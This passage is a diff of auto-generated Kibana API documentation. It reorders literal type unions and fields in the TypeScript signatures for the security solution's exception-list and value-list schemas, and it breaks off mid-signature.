@@ -1939,7 +1939,7 @@ "label": "CreateExceptionListItemSchemaDecoded", "description": [], "signature": [ - "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; comments: { comment: string; }[] | undefined; item_id: string | undefined; meta: object | undefined; namespace_type: \"single\" | \"agnostic\" | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"item_id\" | \"namespace_type\"> & { comments: { comment: string; }[]; tags: string[]; item_id: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | 
\"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" + "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: 
\"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; comments: { comment: string; }[] | undefined; item_id: string | undefined; meta: object | undefined; namespace_type: \"single\" | \"agnostic\" | undefined; os_types: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"item_id\" | \"namespace_type\"> & { comments: { comment: string; }[]; tags: string[]; item_id: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/create_exception_list_item_schema/index.ts", "deprecated": false, 
@@ -2009,7 +2009,7 @@ "label": "CreateListSchema", "description": [], "signature": [ - "{ description: string; name: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; } & { deserializer?: string | undefined; id?: string | undefined; meta?: object | undefined; serializer?: string | undefined; version?: number | undefined; }" + "{ description: string; name: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; } & { deserializer?: string | undefined; id?: string | undefined; meta?: object | undefined; serializer?: string | undefined; version?: number | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/create_list_schema/index.ts", "deprecated": false, 
@@ -2023,7 +2023,7 @@ "label": "CreateListSchemaDecoded", "description": [], "signature": [ - "{ type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; id: string | undefined; name: string; description: string; meta: object | undefined; serializer: string | undefined; deserializer: string | undefined; } & { version: number; }" + "{ type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; id: string | undefined; description: string; name: string; meta: object | undefined; serializer: string | undefined; deserializer: string | undefined; } & { version: number; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/create_list_schema/index.ts", "deprecated": false, 
@@ -2317,7 +2317,7 @@ "label": "EntriesArray", "description": [], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } 
| { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/entries/index.ts", "deprecated": false, 
@@ -2331,7 +2331,7 @@ "label": "EntriesArrayOrUndefined", "description": [], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[] | undefined" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: 
\"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[] | undefined" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/entries/index.ts", "deprecated": false, 
@@ -2345,7 +2345,7 @@ "label": "Entry", "description": [], "signature": [ - "{ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; }" + "{ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/entries/index.ts", "deprecated": false, 
@@ -2373,7 +2373,7 @@ "label": "EntryList", "description": [], "signature": [ - "{ field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; }" + "{ field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/common/entries_list/index.ts", "deprecated": false, 
@@ -2443,7 +2443,7 @@ "label": "ExceptionListItemSchema", "description": [], "signature": [ - "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" + "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; 
description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/exception_list_item_schema/index.ts", "deprecated": false, 
@@ -2765,7 +2765,7 @@ "label": "FoundExceptionListItemSchema", "description": [], "signature": [ - "{ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }" + "{ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: 
string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/found_exception_list_item_schema/index.ts", "deprecated": false, 
@@ -2793,7 +2793,7 @@ "label": "FoundListItemSchema", "description": [], "signature": [ - "{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; page: number; per_page: number; total: number; }" + "{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; page: number; per_page: number; total: number; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/found_list_item_schema/index.ts", "deprecated": false, 
@@ -2807,7 +2807,7 @@ "label": "FoundListSchema", "description": [], "signature": [ - "{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }" + "{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/response/found_list_schema/index.ts", "deprecated": false, 
@@ -2919,7 +2919,7 @@ "label": "ImportExceptionListItemSchema", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; item_id: string; list_id: string; name: string; type: \"simple\"; } & { id?: string | undefined; comments?: (({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; }) | { comment: string; })[] | undefined; created_at?: string | undefined; updated_at?: string | undefined; created_by?: string | undefined; updated_by?: string | undefined; _version?: string | undefined; tie_breaker_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: 
\"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; item_id: string; list_id: string; name: string; type: \"simple\"; } & { id?: string | undefined; comments?: (({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; }) | { comment: string; })[] | undefined; created_at?: string | undefined; updated_at?: string | undefined; created_by?: string | undefined; updated_by?: string | undefined; _version?: string | undefined; tie_breaker_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-io-ts-list-types/src/request/import_exception_item_schema/index.ts", "deprecated": false, 
@@ -2933,7 +2933,7 @@ "label": "ImportExceptionListItemSchemaDecoded", "description": [], "signature": [ - "Omit<{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: \"nested\"; })[]; item_id: string; list_id: string; name: string; type: \"simple\"; } & { id?: string | undefined; comments?: (({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; }) | { comment: string; })[] | undefined; created_at?: string | undefined; updated_at?: string | undefined; created_by?: string | undefined; updated_by?: string | undefined; _version?: string | undefined; tie_breaker_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }, \"tags\" | \"entries\" | \"comments\" | \"item_id\" | 
\"namespace_type\"> & { comments: (({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; }) | { comment: string; })[]; tags: string[]; item_id: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; })[]; field: string; type: 